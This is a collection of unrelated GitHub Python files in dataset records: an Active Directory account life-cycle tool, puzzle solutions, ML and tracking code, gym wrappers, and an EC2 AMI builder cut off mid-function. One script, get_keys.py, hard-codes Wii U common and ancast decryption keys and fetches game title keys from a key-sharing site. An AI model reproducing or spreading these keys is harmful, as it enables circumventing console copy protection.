export_logger.error(\n \"Error creating AD user for MO user %r: %r\",\n employee[\"uuid\"],\n e,\n )\n self.stats[\"critical_errors\"] += 1\n\n return self.stats\n\n\ndef write_stats(stats: Dict[str, Any]) -> None:\n logger.info(\"Stats: {}\".format(stats))\n stats[\"users\"] = \"Written in log file\"\n print(stats)\n\n\ndef run_preview_command_for_uuid(sync: AdLifeCycle, mo_uuid: str):\n commands = sync.ad_writer._preview_create_command(\n mo_uuid, ad_dump=None, create_manager=False\n )\n for cmd in commands:\n click.echo_via_pager(cmd)\n return commands\n\n\n@click.command()\n@click.option(\n \"--create-ad-accounts\",\n default=False,\n is_flag=True,\n help=\"Create AD Users.\",\n type=click.BOOL,\n)\n@click.option(\n \"--disable-ad-accounts\",\n default=False,\n is_flag=True,\n help=\"Disable AD Users.\",\n type=click.BOOL,\n)\n@click.option(\n \"--dry-run\",\n default=False,\n is_flag=True,\n help=\"Dry-run without changes.\",\n type=click.BOOL,\n)\n@click.option(\"--read-from-cache\", is_flag=True, envvar=\"USE_CACHED_LORACACHE\")\n@click.option(\n \"--skip-occupied-names-check\",\n default=False,\n is_flag=True,\n help=\"Skip reading all current user names from AD. Only for testing!\",\n type=click.BOOL,\n)\n@click.option(\n \"--preview-command-for-uuid\",\n help=\"Given a MO user UUID, preview the PowerShell command to be run\",\n type=click.STRING,\n)\ndef ad_life_cycle(\n create_ad_accounts: bool,\n disable_ad_accounts: bool,\n dry_run: bool,\n read_from_cache: bool,\n skip_occupied_names_check: bool,\n preview_command_for_uuid: Optional[uuid.UUID],\n) -> None:\n \"\"\"Create or disable users.\"\"\"\n logger.debug(\n \"Running ad_life_cycle with: {}\".format(\n {\n \"create_ad_accounts\": create_ad_accounts,\n \"disable_ad_accounts\": disable_ad_accounts,\n \"dry_run\": dry_run,\n \"read_from_cache\": read_from_cache,\n }\n )\n )\n\n sync = AdLifeCycle(\n read_from_cache=read_from_cache,\n skip_occupied_names_check=skip_occupied_names_check,\n )\n\n if \"crontab.SENTRY_DSN\" in sync._settings:\n sentry_sdk.init(dsn=sync._settings[\"crontab.SENTRY_DSN\"])\n\n if preview_command_for_uuid:\n run_preview_command_for_uuid(sync, str(preview_command_for_uuid))\n return\n\n if not any([create_ad_accounts, disable_ad_accounts]):\n raise click.ClickException(\n \"Either create_ad_accounts or disable_ad_accounts must be given!\"\n )\n\n if create_ad_accounts:\n stats = sync.create_ad_accounts(dry_run)\n write_stats(stats)\n\n if disable_ad_accounts:\n stats = sync.disable_ad_accounts(dry_run)\n write_stats(stats)\n\n\nif __name__ == \"__main__\":\n start_logging(export_log_file=\"AD_life_cycle.log\")\n ad_life_cycle()\n","repo_name":"OS2mo/os2mo-data-import-and-export","sub_path":"integrations/ad_integration/ad_life_cycle.py","file_name":"ad_life_cycle.py","file_ext":"py","file_size_in_byte":20093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"43860690007","text":"def parse_input(input_lines):\n program = []\n for line in input_lines:\n instruction = line.split()\n if len(instruction) == 2:\n instruction[1] = int(instruction[1])\n program.append(instruction)\n return program\n\ndef simulate(program, callback):\n regValue = 1\n cycle = 0\n for instruction in program:\n cmd = instruction[0]\n if cmd == \"noop\":\n cycle += 1\n callback(cycle, regValue)\n else: #addx\n callback(cycle + 1, regValue)\n cycle += 2\n callback(cycle, regValue)\n regValue += instruction[1]\n\ndef part1(input_lines):\n program = parse_input(input_lines)\n values = []\n def callback(cycle, regValue):\n if cycle % 40 == 20:\n values.append(cycle * regValue)\n simulate(program, callback)\n return sum(values)\n\ndef part2(input_lines):\n program = parse_input(input_lines)\n image = '' \n def callback(cycle, regValue):\n nonlocal image\n horizontalPos = (cycle-1) % 40\n if horizontalPos >= regValue - 1 and horizontalPos <= regValue + 1:\n pixel = '#'\n else:\n pixel = '.'\n image += pixel\n if horizontalPos == 39:\n image += '\\n'\n simulate(program, callback)\n return image\n\nexample_image=\\\n'##..##..##..##..##..##..##..##..##..##..\\n' +\\\n'###...###...###...###...###...###...###.\\n' +\\\n'####....####....####....####....####....\\n' +\\\n'#####.....#####.....#####.....#####.....\\n' +\\\n'######......######......######......####\\n' +\\\n'#######.......#######.......#######.....\\n'\n\nexample_answers = [13140, example_image]","repo_name":"TurboErbo/AdventOfCode","sub_path":"2022/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"15276373500","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @File : path.py\r\n# @Author: Zhan\r\n# @Date : 7/18/2019\r\n# @Desc : 数据、模型、字典等文件路径\r\n\r\nimport sys\r\nimport os\r\n\r\nfrom bert import modeling\r\n\r\nfrom flyai.utils import remote_helper\r\n\r\ncPath = os.getcwd()\r\n# 训练数据的路径\r\nDATA_PATH = os.path.join(cPath, 'data', 'input')\r\n# 模型保存的路径\r\nMODEL_PATH = os.path.join(cPath, 'data', 'output', 'model')\r\n# 训练log的输出路径\r\nLOG_PATH = os.path.join(cPath, 'data', 'output', 'logs')\r\n\r\n# 必须使用该方法下载模型,然后加载\r\nBERT_PATH = os.path.dirname(remote_helper.get_remote_date(\"https://www.flyai.com/m/chinese_L-12_H-768_A-12.zip\"))\r\nBERT_PATH = os.path.join(BERT_PATH, 'chinese_L-12_H-768_A-12')\r\nprint('BERT_PATH:{}'.format(BERT_PATH))\r\n# BERT_PATH = r'D:\\jack_doc\\python_src\\flyai\\chinese_L-12_H-768_A-12'\r\nBERT_CONFIG = modeling.BertConfig.from_json_file(os.path.join(BERT_PATH,\"bert_config.json\"))\r\nBERT_CKPT = os.path.join(BERT_PATH,'bert_model.ckpt')\r\nVOCAB_FILE=os.path.join(BERT_PATH,\"vocab.txt\")\r\n\r\n\r\nTENSORFLOW_MODEL_DIR = \"dpNet.ckpt\"","repo_name":"passionzhan/flyai_contest","sub_path":"spamMessage_bert/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"3015757088","text":"# https://programmers.co.kr/learn/courses/30/lessons/42626\nimport heapq\n\ndef solution(scoville, K):\n heapq.heapify(scoville)\n count = 0\n while True:\n first = heapq.heappop(scoville)\n if len(scoville) == 0 and first < K:\n return -1\n elif first >= K:\n return count\n else:\n second = heapq.heappop(scoville)\n new = first + 2*second\n heapq.heappush(scoville, new)\n count += 1\n","repo_name":"hongminpark/prgrms-algorithms","sub_path":"heap/lv2_더맵게.py","file_name":"lv2_더맵게.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"4974916366","text":"import os, sys\nimport socket\ndef getLocalIP():\n # s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n # s.connect(('localhost', 80))\n # print (s.getsockname())\n # s.close()\n if os.name == 'nt':\n a = socket.getaddrinfo(socket.gethostname(), None, 2, 1, 0)\n print (a)\n\n\ngetLocalIP()\nsys.exit()\n\nfrom functions_s import _PLATFORM, _ROOT_DIR, info_from_db\n\n\nprint(_PLATFORM)\nprint (_ROOT_DIR)\nprint(info_from_db(title=\"startBI\", type=\"txt\"))\nsys.exit()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nabsdir = os.path.dirname(os.path.abspath(sys.argv[0]))\nos.chdir(absdir)\nrootdir = os.path.dirname(absdir)\n\n\ndef getServiceSt():\n print (os.getcwd())\n if os.name == 'posix':\n arr_rs = {\n \"mysqld\" :{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"nginx\" :{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"php-fpm\":{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"startbi\":{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n }\n # for line in os.popen(\"\"\" ps -ef |grep -P \"nginx|php|startBi|mysqld\" | grep -v \"grep\" \"\"\").read().splitlines():\n for line in os.popen(\"\"\" ps -ef \"\"\").read().splitlines():\n line = line.lower().strip()\n if not line:\n continue\n for rs in arr_rs:\n if line.find(rs) >= 0 :\n arr_rs[rs]['status'] = \"running\"\n arr_rs[rs]['code'] = 1\n\n # for rs in arr_rs:\n # if arr_rs[rs]['status'] == \"running\":\n # arr_rs[rs]['path'] = os.popen(\"which %s \" %rs).read().strip()\n\n elif os.name == 'nt':\n arr_rs = {\n \"mysqld\" :{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"nginx\" :{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"php-cgi\":{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"startbi\":{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n }\n\n cmd_str = \"\"\"wmic process where \"name='mysqld.exe' or name='php-cgi.exe' or name='nginx.exe' or commandline='python3.exe startBI.py'\" get caption, commandline, executablePath\"\"\"\n for line in str(os.popen(cmd_str).read()).splitlines():\n line = line.lower().strip()\n if not line:\n continue\n for rs in arr_rs:\n if line.lower().find(rs) >= 0 :\n arr_rs[rs]['status'] = \"running\"\n tabs = line.split(\" \")\n arr_rs[rs]['path'] = os.path.dirname(tabs[-1])\n arr_rs[rs]['code'] = 1 if arr_rs[rs]['path'].find(rootdir) >=0 else -1\n\n return arr_rs\n\nx = getServiceSt()\n\nprint(x)\n\n# from init_db import init_db_main\n\n\n# init_db_main()","repo_name":"hanskimvz/Cosilan","sub_path":"bin/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"14963179576","text":"from day7.Day7 import *\n\n\ndef test_find_possible_outer_bags():\n rules = {'vibrant bronze bag': [InnerBag(3, 'dim olive bag')],\n 'shiny teal bag': [InnerBag(1, 'posh green bag'),\n InnerBag(5, 'pale indigo bag'),\n InnerBag(1, 'mirrored purple bag')]}\n\n result = find_possible_outer_bags('pale indigo bag', rules)\n\n assert result == ['shiny teal bag']\n\n\ndef test_can_contain_target__false():\n rules = {'vibrant bronze bag': [InnerBag(3, 'dim olive bag')]}\n\n result = can_contain_target('vibrant bronze bag', 'shiny olive bag', rules)\n\n assert result is False\n\n\ndef test_can_contain_target__directly_contained():\n rules = {'vibrant bronze bag': [InnerBag(3, 'dim olive bag')]}\n\n result = can_contain_target('vibrant bronze bag', 'dim olive bag', rules)\n\n assert result is True\n\n\ndef test_can_contain_target__indirectly_contained():\n rules = {'vibrant bronze bag': [InnerBag(3, 'shiny teal bag')],\n 'shiny teal bag': [InnerBag(1, 'posh green bag'),\n InnerBag(5, 'pale indigo bag'),\n InnerBag(1, 'mirrored purple bag')]}\n\n result = can_contain_target('vibrant bronze bag', 'pale indigo bag', rules)\n\n assert result is True\n\n\ndef test_count_contained_bags():\n rules = {'vibrant bronze bag': [InnerBag(3, 'shiny teal bag')],\n 'shiny teal bag': [InnerBag(1, 'posh green bag'),\n InnerBag(5, 'pale indigo bag'),\n InnerBag(1, 'mirrored purple bag')]}\n\n result = count_contained_bags('vibrant bronze bag', rules)\n\n assert result == 3 + 3 * (1 + 5 + 1)\n\n\ndef test_count_contained_bags__from_another_example():\n rules = {'shiny gold bag': [InnerBag(2, 'dark red bag')],\n 'dark red bag': [InnerBag(2, 'dark orange bag')],\n 'dark orange bag': [InnerBag(2, 'dark yellow bag')],\n 'dark yellow bag': [InnerBag(2, 'dark green bag')],\n 'dark green bag': [InnerBag(2, 'dark blue bag')],\n 'dark blue bag': [InnerBag(2, 'dark violet bag')],\n 'dark violet bag': []}\n\n result = count_contained_bags('shiny gold bag', rules)\n\n assert result == 126\n\n\ndef test_count_contained_bags__from_example():\n rules = {'shiny gold bag': [InnerBag(1, 'dark olive bag'), InnerBag(2, 'vibrant plum bag')],\n 'dark olive bag': [InnerBag(3, 'faded blue bag'), InnerBag(4, 'dotted black bag')],\n 'vibrant plum bag': [InnerBag(5, 'faded blue bag'), InnerBag(6, 'dotted black bag')],\n 'faded blue bag': [],\n 'dotted black bag': []}\n\n result = count_contained_bags('shiny gold bag', rules)\n\n assert result == 32\n","repo_name":"treegem/AdventOfCode2020","sub_path":"src/test/day7/test_day7.py","file_name":"test_day7.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"36779313525","text":"#!/usr/bin/python\nfrom urllib2 import urlopen\nimport json, unicodedata\n\n\nurl='https://wiiu.titlekeys.com/json'\nresponse = urlopen(url)\nparsed = json.load(response)\nkey_file = open(\"keys.txt\",'w') \nkey_file.write(\"\"\"#Common Keys#\nD7B00402659BA2ABD2CB0DB27FA2B656 # Wii U Common Key:\n805E6285CD487DE0FAFFAA65A6985E17 # Wii U Espresso Ancast Key\nB5D8AB06ED7F6CFC529F2CE1B4EA32FD # Wii U Starbuck Ancast Key\n############################################################\n\n\"\"\")\ndata=''\nfor i in xrange(len(parsed)):\n if parsed[i]['titleKey'] == None or parsed[i]['name'] == None:\n pass\n else:\n key = parsed[i]['titleKey']\n name = parsed[i]['name']\n name = name.replace('\\n','').replace('\\t','')\n name = unicodedata.normalize('NFKD', name).encode('ascii','ignore')\n region = parsed[i]['region']\n line_data = str(key),' # ',name,' (',region,')'\n normalized_data = \"\".join(line_data)\n key_file.write(\"%s\\n\" %normalized_data)\nkey_file.close()\n","repo_name":"d0t1q/wiiu_keys","sub_path":"get_keys.py","file_name":"get_keys.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"30136138028","text":"from collections import deque\nfrom sys import stdin\ndef input(): return stdin.readline().strip()\n\n\ndef read_int():\n return int(input())\n\n\ndef read_ints():\n return map(int, input().split())\n\n\nt = read_int()\nfor case_num in range(t):\n n = read_int()\n d = [list(read_ints()) for _ in range(n)]\n mem = [[] for _ in range(n + 1)]\n valid = True\n for i, (u, v) in enumerate(d):\n if u == v:\n valid = False\n break\n mem[u].append(i)\n mem[v].append(i)\n if len(mem[u]) > 2 or len(mem[v]) > 2:\n valid = False\n break\n\n if not valid:\n print('NO')\n continue\n\n vis = [False] * (n + 1)\n num = [set() for _ in range(3)]\n state = [0] * n\n\n for i in range(1, n + 1):\n if vis[i]:\n continue\n\n dq = deque()\n dq.append(i)\n\n while len(dq) > 0:\n u = dq.popleft()\n a, b = mem[u]\n if state[a] == state[b] == 0:\n state[a] = 1\n state[b] = 2\n num[1].add(u)\n up1 = d[a][0] + d[a][1] - u\n num[1].add(up1)\n if not vis[up1]:\n vis[up1] = True\n dq.append(up1)\n\n num[2].add(u)\n up2 = d[b][0] + d[b][1] - u\n num[2].add(up2)\n if not vis[up2]:\n vis[up2] = True\n dq.append(up2)\n elif state[a] + state[b] == 3:\n continue\n elif state[a] == state[b]:\n valid = False\n break\n elif state[a] > 0:\n state[b] = 3 - state[a]\n num[state[b]].add(u)\n up2 = d[b][0] + d[b][1] - u\n num[state[b]].add(up2)\n if not vis[up2]:\n vis[up2] = True\n dq.append(up2)\n elif state[b] > 0:\n state[a] = 3 - state[b]\n num[state[a]].add(u)\n up1 = d[a][0] + d[a][1] - u\n num[state[a]].add(up1)\n if not vis[up1]:\n vis[up1] = True\n dq.append(up1)\n\n if not valid:\n break\n\n print('YES' if valid else 'NO')\n","repo_name":"lucifer1004/codeforces","sub_path":"1702/e/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"15063188398","text":"# coding=utf-8\nfrom scipy.spatial import distance as dist\nfrom collections import OrderedDict\nimport numpy as np\n\nclass CentroidTracker:\n def __init__(self, maxDisappeared=50, maxDistance=50):\n # Inicializamos el próximo Object ID único, junto a dos diccionarios ordenados,\n # que se utilizarán para mantener constancia de los objetos que se están siguiendo\n # (y calculando su centroide), y para mantener dichos objetos que ya no son visibles\n # durante un periodo de tiempom antes de marcarlos como perdidos.\n self.nextObjectID = 0\n self.objects = OrderedDict()\n self.disappeared = OrderedDict()\n\n # Cual es el número de frames consecutivos máximo que un objeto puede estar\n # desaparecido antes de ser desregistrado como objeto.\n self.maxDisappeared = maxDisappeared\n\n self.maxDistance = maxDistance\n\n def register(self, centroid):\n # Cuando registramos un objeto, utilizamos el siguiente ID disponible\n # para almacenar su centroide.\n self.objects[self.nextObjectID] = centroid\n self.disappeared[self.nextObjectID] = 0\n self.nextObjectID += 1\n\n def deregister(self, objectID):\n # Una vez se ha dado por perdido un objeto, desregistramos su ID.\n del self.objects[objectID]\n del self.disappeared[objectID]\n\n def update(self, rects):\n # Comprobamos si la lista de bounding boxes (rects) está vacía.\n if len(rects) == 0:\n # Si teníamos algún objeto marcado como tracked, lo marcamos como desaparecido.\n for objectID in list(self.disappeared.keys()):\n self.disappeared[objectID] += 1\n # Si hemos alcanzado el máximo número de frames consecutivos,\n # desregistramos el objeto\n if self.disappeared[objectID] > self.maxDisappeared:\n self.deregister(objectID)\n # No existen centroides para trackear.\n return self.objects\n\n # Inicializamos un array para los centroides recibidos en el frame actual, y lo\n # inicializamos a 0\n inputCentroids = np.zeros((len(rects), 2), dtype=\"int\")\n\n # Iteramos sobre las bounding boxes\n for (i, (startX, startY, endX, endY)) in enumerate(rects):\n # Calculamos el centroide\n cX = int((startX + endX) / 2.0)\n cY = int((startY + endY) / 2.0)\n inputCentroids[i] = (cX, cY)\n\n # Si no estamos trackeando ningun objeto, registramos los nuevos centroides\n if len(self.objects) == 0:\n for i in range(0, len(inputCentroids)):\n self.register(inputCentroids[i])\n\n # Si ya estamos trackeando algún objeto, primero intentamos emparejar\n # los nuevos centroides con los que eisten ya de los objetos tackeados.\n else:\n # Obtenemos los IDs y centroides de los objetos\n objectIDs = list(self.objects.keys())\n objectCentroids = list(self.objects.values())\n\n # Calculamos la distancia entre cada par de centroide trackeado y\n # de nuevos centroides. Nuestro objetivo es emparejar un nuevo centroide con alguno\n # de los existentes.\n D = dist.cdist(np.array(objectCentroids), inputCentroids)\n\n # Para poder emparejarlos, debemos encontrar el valor más pequeño en cada fila,\n # y entonces ordenar la fila por indexes de menor a mayor valor. De tal forma que\n # la fila con el valor más pequeño quede al principio.\n # axis = 0 es columnas, axis = 1 es filas.\n # TODO Probar esto y que es argsort()\n\n # Después de entender mejor, esto devuelve el valor mínimo de cada fila, y además,\n # los ordena de menor a mayor, y devuelve un array del siguiente tipo, por ejemplo,\n # si tuvieramos solo 2 rows: rows = [1,0]. Es to significaría que el valor mínimo\n # se encuentra en la row 1, y el siguiente valor mínimo en la row 0, y así.\n rows = D.min(axis=1).argsort()\n\n # Después, buscamos los valores mínimos en cada columna, y ordenándolos\n # utilizando los index de las filas calculados anteriormente\n # axis = 0 es columnas, axis = 1 es filas.\n\n # Después, el argmin hace lo mismo que el min, devuelve las\n # columnas con los valores mínimos de cada fila, en el caso de tener 2 filas,\n # podría devolver algo como, cols = [1, 2], indicando que en la columna 1 se encuentra\n # el valor más pequeño de la fila 0, y en la columna 2 se encuentra el valor más pequeño\n # de la columna 1. El [rows] del final sirve para ordenar los valores por filas, por tanto\n # si el valor de la fila 1, es menor que le de la fila 0, el resultado de cols será,\n # cols = [2, 1].\n cols = D.argmin(axis=1)[rows]\n\n # Para determinar si tenemos que actualizar, registrar o desregistrar un objeto,\n # debemos trackear cual de los indexes de las filas y columnas ya hemos examinado.\n usedRows = set()\n usedCols = set()\n\n # Iteramos sobre cada tupla de combinación de index (fila, columna)\n # Zip devuelve un iterador de tuplas\n\n # Después, el zip lo que hace es combinar las filas con las columnas, si por ejemplo las\n # rows = [1, 0], y las cols = [2, 1], entonces el zip(rows, cols) = [(1, 2), (0, 1)]\n # Esto implica, que el segundo objeto existente, hará match con el tercer input centroid,\n # ya que el zip devuelve (1, 2), y del mismo modo, el primer objeto existente hará match\n # con el segundo input centroid (0, 1).\n for (row, col) in zip(rows, cols):\n\n # Si ya hemos examinado la fila o la columna, la ignoramos\n if row in usedRows or col in usedCols:\n continue\n\n # if the distance between centroids is greater than\n # the maximum distance, do not associate the two\n # centroids to the same object\n if D[row, col] > self.maxDistance:\n continue\n\n # Si no, obtenemos el objectID de la fila actual, establecemos su\n # nuevo centroide y reseteamos el contador de desaparecido.\n objectID = objectIDs[row]\n self.objects[objectID] = inputCentroids[col]\n self.disappeared[objectID] = 0\n\n # Indicamos que hemos examinado el index de la fila y la columna.\n usedRows.add(row)\n usedCols.add(col)\n\n # Calculamos el indice de la fila y columna que todavia no hemos examinado\n unusedRows = set(range(0, D.shape[0])).difference(usedRows)\n unusedCols = set(range(0, D.shape[1])).difference(usedCols)\n\n # En el caso de que el numero de centroides de objeto es mayor o igual\n # al numero de nuevos centroides, debemos comprobar si algunos objetos\n # han desaparecido\n if D.shape[0] >= D.shape[1]:\n\n # Iterar sobre las filas sin examinar\n for row in unusedRows:\n\n # Obtener el ID del objeto de la fila correspondiente\n # e incrementar el contador de desaparecido.\n objectID = objectIDs[row]\n self.disappeared[objectID] += 1\n\n # Revisamos que el contador no haya llegado a su límite, si es así\n # desregistramos el objeto\n # for warrants deregistering the object\n if self.disappeared[objectID] > self.maxDisappeared:\n self.deregister(objectID)\n\n # Si no, si el número de nuevos centroides es mayor que el número de \n # centroides registrados, debemos registrar todos los nuevos.\n else:\n for col in unusedCols:\n self.register(inputCentroids[col])\n\n # Devolvemos los objetos trackeables\n return self.objects\n","repo_name":"alu0100881165/tfg","sub_path":"centroidTrackable/centroidtracker.py","file_name":"centroidtracker.py","file_ext":"py","file_size_in_byte":8195,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"39782816878","text":"import gym\nfrom stable_baselines import A2C\nfrom stable_baselines.common.vec_env import DummyVecEnv\nfrom stable_baselines.bench import Monitor\nimport numpy as np\nimport os\n\n\n# 正常的 Gym-wrapper, 没有完成任何工作\nclass CustomWrapper(gym.Wrapper):\n def __init__(self, env):\n # 输出参数只有一个, 是 env\n super(CustomWrapper, self).__init__(env)\n\n def reset(self):\n obs = self.env.reset()\n return obs\n\n def step(self, action):\n obs, reward, done, info = self.env.step(action)\n return obs, reward, done, info\n\n##############################\n# 1. 限制周期长度的wrapper\n##############################\n\n\nclass TimeLimitWrapper(gym.Wrapper):\n ## 显示了周期的最大长度. 在 init 里面初始化 max_steps, 在 step 中检测如果超过 max_steps 就将 done 设为 True\n def __init__(self, env, max_steps=100):\n super(TimeLimitWrapper, self).__init__(env)\n self.max_steps = max_steps\n self.current_step = 0\n\n def reset(self):\n self.current_step = 0\n return self.env.reset()\n\n def step(self, action):\n self.current_step += 1\n obs, reward, done, info = self.env.step(action)\n if self.current_step >= self.max_steps:\n done = True\n info['time_limit_reached'] = True\n return obs, reward, done, info\n\n\ndef test_time_limit_wrapper():\n # 100 {'time_limit_reached': True}\n env = gym.make(\"Pendulum-v0\")\n env = TimeLimitWrapper(env, max_steps=100)\n obs = env.reset()\n done = False\n n_steps = 0\n while not done:\n random_action = env.action_space.sample()\n obs, reward, done, info = env.step(random_action)\n n_steps += 1\n print(n_steps, info)\n\n##############################\n# 2. 限制动作范围的 wrapper\n##############################\n\n\nclass NormalizeActionWrapper(gym.Wrapper):\n # 将 action space 规约到 -1~1 之间\n # step 函数中, 将输入的 (-1,1) 的动作, 重新规约到原来的动作空间中, 再调用函数进行 step\n def __init__(self, env):\n # 保留原来的 action space 的范围\n action_space = env.action_space\n self.low, self.high = action_space.low, action_space.high\n # 重置 action space 为 [-1,1] 之间\n env.action_space = gym.spaces.Box(low=-1, high=1, shape=action_space.shape, dtype=np.float32)\n super(NormalizeActionWrapper, self).__init__(env)\n\n def rescale_action(self, scaled_action):\n # 将输入 x~[-1, 1] 之间的动作重新规约到 y~[self.low, high] 之间\n # y = (x-(-1))*[(high-low)/(1-(-1))]+low\n return (scaled_action + 1.0) * (self.high - self.low) * 0.5 + self.low\n\n def reset(self):\n return self.env.reset()\n\n def step(self, action):\n rescaled_action = self.rescale_action(action)\n obs, reward, done, info = self.env.step(rescaled_action)\n return obs, reward, done, info\n\n\ndef test_normalize_action_wrapper():\n # 在原始初始化的 env 中采样多个动作, 随后再 NormalizeActionWrapper 后的 env 中采样多个动作\n env = gym.make(\"Pendulum-v0\")\n print(\"original env:\", env.action_space.low, env.action_space.high)\n env.reset()\n for _ in range(5):\n print(\"sample action:\", env.action_space.sample())\n\n # wrapper\n env = NormalizeActionWrapper(env)\n env.reset()\n for _ in range(5):\n print(\"Normalized action:\", env.action_space.sample())\n\n\n##############################\n# 3. wrapper 与 stable baselines 中的 agent 结合进行训练\n##############################\n\n\n# Monitor 可以记录环境在运行过程中产生的记录 mean episode reward, mean episode length\ndef test_monitor():\n env = gym.make('Pendulum-v0')\n env = Monitor(gym.make('Pendulum-v0'), filename=None, allow_early_resets=True)\n normalized_env = NormalizeActionWrapper(env)\n normalized_env = DummyVecEnv([lambda: normalized_env])\n # model\n model_2 = A2C('MlpPolicy', normalized_env, verbose=1).learn(1000)\n\n\n################################\n# 4. VecNormalize 是 stable baselines 中提供的规约, 记录在运行过程中的 state 的 std 和 return 的 std\n################################\nfrom stable_baselines.common.vec_env import VecNormalize, VecFrameStack\n\n\ndef test_vec_normalize():\n env = DummyVecEnv([lambda: gym.make(\"Pendulum-v0\")])\n normalized_vec_env = VecNormalize(env)\n obs = normalized_vec_env.reset()\n for _ in range(10):\n action = [normalized_vec_env.action_space.sample()]\n obs, reward, _, _ = normalized_vec_env.step(action)\n print(obs, reward)\n\n################################\n# 5. VecFrameStack 用于在 Atari 将相邻几帧进行叠加\n################################\n\n\ndef test_frame_stack():\n env = DummyVecEnv([lambda: gym.make(\"Pendulum-v0\")])\n obs = env.reset()\n print(\"Before FrameStack, observation.shape =\", obs.shape) # (1, 3)\n\n frame_stack_env = VecFrameStack(env, n_stack=4) # 叠加连续的 4 帧组成状态\n obs = frame_stack_env.reset()\n print(\"After FrameStack, observation.shape =\", obs.shape) # (1, 12)\n\n\nif __name__ == '__main__':\n # test_time_limit_wrapper()\n # test_normalize_action_wrapper()\n # test_monitor()\n # test_vec_normalize()\n test_frame_stack()\n\n\n\n","repo_name":"Baichenjia/Stable-Baselines-Basic","sub_path":"4-Gym-wrapper.py","file_name":"4-Gym-wrapper.py","file_ext":"py","file_size_in_byte":5317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7059144327","text":"import pathlib\n\nimport click\nimport PyQt5.uic\n\n\n@click.command()\n@click.option(\n \"--ui\",\n \"ui_paths\",\n multiple=True,\n type=click.Path(exists=True, dir_okay=False),\n)\n@click.option(\n \"--directory\",\n \"--dir\",\n \"directories\",\n default=[\".\"],\n multiple=True,\n type=click.Path(exists=True, file_okay=False),\n)\n@click.option(\"--suffix\", default=\"_ui\")\n@click.option(\"--encoding\", default=\"utf-8\")\ndef cli(ui_paths, directories, suffix, encoding):\n ui_paths = [pathlib.Path(path) for path in ui_paths]\n\n for directory in directories:\n path = pathlib.Path(directory)\n found_paths = path.rglob(\"*.ui\")\n ui_paths.extend(found_paths)\n\n for path in ui_paths:\n in_path = path\n out_path = path.with_name(f\"{path.stem}{suffix}.py\")\n\n click.echo(f\"Converting: {in_path} -> {out_path}\")\n with open(out_path, \"w\", encoding=encoding) as out_file:\n PyQt5.uic.compileUi(in_path, out_file)\n","repo_name":"epcpower/stlib","sub_path":"epyqlib/compileui.py","file_name":"compileui.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"9920674960","text":"#!/usr/bin/python2\n\nimport boto3, argparse, urllib, time, json, subprocess, os.path\nimport argparse\n\nclass Metadata(object):\n base = 'http://169.254.169.254/latest/meta-data/'\n def _get(self, what):\n return urllib.urlopen(Metadata.base + what).read()\n def instance_id(self):\n return self._get('instance-id')\n def availability_zone(self):\n return self._get('placement/availability-zone')\n def region(self):\n return self.availability_zone()[:-1]\n\ndef wait_for(ec2_obj, status='available'):\n while ec2_obj.state != status:\n #print('object status {} wanted {}'.format(ec2_obj.status, status))\n time.sleep(1)\n ec2_obj.reload()\n\n#input = '/home/ubuntu/capstan-java-example.img'\ninput = '/home/ubuntu/small-osv-node.img'\n\ndef to_gib(size):\n gib = 1 << 30\n return (size + gib - 1) >> 30\n\ndef image_size(filename):\n info = json.loads(subprocess.check_output(['qemu-img', 'info', '--output=json', filename]))\n return info['virtual-size']\n\ndef copy_image(img, out):\n subprocess.check_call(['sudo', 'cp', img, out])\n\ndef make_ami(input, name):\n metadata = Metadata()\n print('Connecting')\n conn = boto3.resource('ec2',region_name=\"us-west-2\")\n #conn = ec2.connect_to_region(metadata.region())\n print('Creating volume')\n vol = conn.create_volume(Size=to_gib(image_size(input)),\n AvailabilityZone=metadata.availability_zone(),\n )\n print('Waiting for {}'.format(vol.id))\n wait_for(vol)\n #vol = conn.describe_volumes([vol.id])[0]\n print('Attaching {} to {}'.format(vol.id, metadata.instance_id()))\n att = vol.attach_to_instance(InstanceId=metadata.instance_id(), Device='xvdf')\n while not os.path.exists('/dev/xvdf'):\n #print('waiting for volume to attach')\n time.sleep(1)\n print('Copying image')\n copy_image(input, '/dev/xvdf')\n print('Detaching {}'.format(vol.id))\n vol.detach_from_instance()\n print('Creating snapshot from {}'.format(vol.id))\n snap = vol.create_snapshot()\n #snap = conn.get_all_snapshots([snap.id])[0]\n wait_for(snap, 'completed')\n print('Deleting 